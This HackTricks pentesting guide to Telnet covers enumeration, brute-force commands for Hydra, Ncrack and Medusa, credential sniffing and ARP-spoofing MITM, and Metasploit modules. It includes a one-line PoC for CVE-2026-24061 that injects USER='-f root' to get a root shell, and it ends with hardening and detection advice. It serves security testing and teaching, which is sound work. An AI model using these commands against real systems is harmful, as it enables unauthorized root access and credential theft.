23 - Pentesting Telnet

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Basic Information

Telnet is a network protocol that gives users a UNsecure way to access a computer over a network.

Default port: 23

23/tcp open  telnet

Enumeration

nc -vn <IP> 23

All the interesting enumeration can be performed by nmap:

nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>

The script telnet-ntlm-info.nse will obtain NTLM info (Windows versions).

From the telnet RFC: In the TELNET Protocol are various “options” that will be sanctioned and may be used with the “DO, DON’T, WILL, WON’T” structure to allow a user and server to agree to use a more elaborate (or perhaps just different) set of conventions for their TELNET connection. Such options could include changing the character set, the echo mode, etc.

I know it is possible to enumerate this options but I don’t know how, so let me know if know how.

Enumerate Telnet Options / Features

Telnet uses IAC + DO/DONT/WILL/WONT negotiations to enable options. You can observe supported options by capturing the initial negotiation and by probing for specific features.

Nmap option/feature probes

# Detect support for the Telnet ENCRYPT option
nmap -p 23 --script telnet-encryption <IP>

# Enumerate Microsoft Telnet NTLM info (NetBIOS/DNS/OS build)
nmap -p 23 --script telnet-ntlm-info <IP>

# Brute-force via NSE (alternative to Hydra/Medusa)
nmap -p 23 --script telnet-brute --script-args userdb=users.txt,passdb=pass.txt <IP>

The telnet-encryption script checks whether the ENCRYPT option is supported; some implementations historically handled this option incorrectly and were vulnerable, but the script only checks support. telnet-ntlm-info discloses NTLM metadata (NetBIOS/DNS/OS build) when Microsoft Telnet NTLM is enabled. telnet-brute is an NSE brute-force auditor for Telnet.

Brute force

Config file

/etc/inetd.conf
/etc/xinetd.d/telnet
/etc/xinetd.d/stelnet

HackTricks Automatic Commands

Protocol_Name: Telnet    #Protocol Abbreviation if there is one.
Port_Number:  23     #Comma separated if there is more than one.
Protocol_Description: Telnet          #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for t=Telnet
  Note: |
    wireshark to hear creds being passed
    tcp.port == 23 and ip.addr != myip

    https://book.hacktricks.wiki/en/network-services-pentesting/pentesting-telnet.html

Entry_2:
  Name: Banner Grab
  Description: Grab Telnet Banner
  Command: nc -vn {IP} 23

Entry_3:
  Name: Nmap with scripts
  Description: Run nmap scripts for telnet
  Command: nmap -n -sV -Pn --script "*telnet*" -p 23 {IP}

Entry_4:
  Name: consoleless mfs enumeration
  Description: Telnet enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'

Recent Vulnerabilities (2022-2026)

  • CVE-2024-45698 – D-Link Wi-Fi 6 routers (DIR-X4860): Improper input validation in the telnet service allows remote attackers to log in using hard-coded credentials and inject OS commands; fixed by firmware 1.04B05 or later.
  • CVE-2023-40478 – NETGEAR RAX30: Stack-based buffer overflow in the Telnet CLI passwd command enables network-adjacent code execution as root; authentication is required but can be bypassed.
  • CVE-2022-39028 – GNU inetutils telnetd: A two-byte sequence (0xff 0xf7 / 0xff 0xf8) can trigger a NULL-pointer dereference in telnetd, and repeated crashes can lead inetd to disable the service (DoS).

Keep these CVEs in mind during vulnerability triage—if the target is running an un-patched firmware or legacy inetutils Telnet daemon you may have a straight-forward path to code-execution or a disruptive DoS.

CVE-2026-24061 — GNU Inetutils telnetd auth bypass (Critical)

Primitive: Telnet NEW_ENVIRON lets clients push environment variables during option negotiation; inetutils telnetd substitutes %U in its login template with getenv("USER") and passes it directly to /usr/bin/login, enabling argv-level option injection (no shell expansion). Root cause: versions 1.9.3–2.7 expand %U without filtering, so a USER value beginning with - is parsed as a login flag. For example, %U becomes -f root, yielding /usr/bin/login -h <hostname> "-f root" and skipping authentication via login -f.

Exploit flow:

  1. Connect to the Telnet service and negotiate NEW_ENVIRON to set USER=-f root.
  2. telnetd builds the login argv including the attacker-controlled %U value.
  3. /usr/bin/login interprets -f root as “pre-authenticated user root” and spawns a root shell.

PoC

# Inject USER via NEW_ENVIRON and obtain a root shell
USER='-f root' telnet -a <ip>

Patch note: inetutils 2.7-2 introduces a sanitize() helper that rejects values starting with - or containing whitespace/metacharacters before substituting them into the login argv, blocking option injection. Detection/verification: identify exposed daemons with telnetd --version, dpkg -l | grep inetutils, systemctl status inetutils-telnetd, or netstat -tlnp | grep :23.

Mitigations

  • Patch/upgrade affected packages immediately (e.g., Debian fixes are in 2:2.4-2+deb12u2, 2:2.6-3+deb13u1, and 2:2.7-2).
  • Disable Telnet or restrict access to trusted management networks while patching.

Sniffing Credentials & Man-in-the-Middle

Telnet transmits everything, including credentials, in clear-text. Two quick ways to capture them:

# Live capture with tcpdump (print ASCII)
sudo tcpdump -i eth0 -A 'tcp port 23 and not src host $(hostname -I | cut -d" " -f1)'

# Wireshark display filter
 tcp.port == 23 && (telnet.data || telnet.option)

For active MITM, combine ARP spoofing (e.g. arpspoof/ettercap) with the same sniffing filters to harvest passwords on switched networks.

Automated Brute-force / Password Spraying

# Hydra (stop at first valid login)
hydra -L users.txt -P rockyou.txt -t 4 -f telnet://<IP>

# Ncrack (drop to interactive session on success)
ncrack -p 23 --user admin -P common-pass.txt --connection-limit 4 <IP>

# Medusa (parallel hosts)
medusa -M telnet -h targets.txt -U users.txt -P passwords.txt -t 6 -f

Most IoT botnets (Mirai variants) still scan port 23 with small default-credential dictionaries—mirroring that logic can quickly identify weak devices.

Exploitation & Post-Exploitation

Metasploit has several useful modules:

  • auxiliary/scanner/telnet/telnet_version – banner & option enumeration.
  • auxiliary/scanner/telnet/brute_telnet – multithreaded bruteforce.
  • auxiliary/scanner/telnet/telnet_encrypt_overflow – RCE against vulnerable Solaris 9/10 Telnet (option ENCRYPT handling).
  • exploit/linux/mips/netgear_telnetenable – enables telnet service with a crafted packet on many NETGEAR routers.

After a shell is obtained remember that TTYs are usually dumb; upgrade with python -c 'import pty;pty.spawn("/bin/bash")' or use the HackTricks TTY tricks.

Hardening & Detection (Blue team corner)

  1. Prefer SSH and disable Telnet service completely.
  2. If Telnet is required, bind it to management VLANs only, enforce ACLs and wrap the daemon with TCP wrappers (/etc/hosts.allow).
  3. Replace legacy telnetd implementations with ssl-telnet or telnetd-ssl to add transport encryption, but this only protects data-in-transit—password-guessing remains trivial.
  4. Monitor for outbound traffic to port 23; compromises often spawn reverse shells over Telnet to bypass strict-HTTP egress filters.

References

Tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks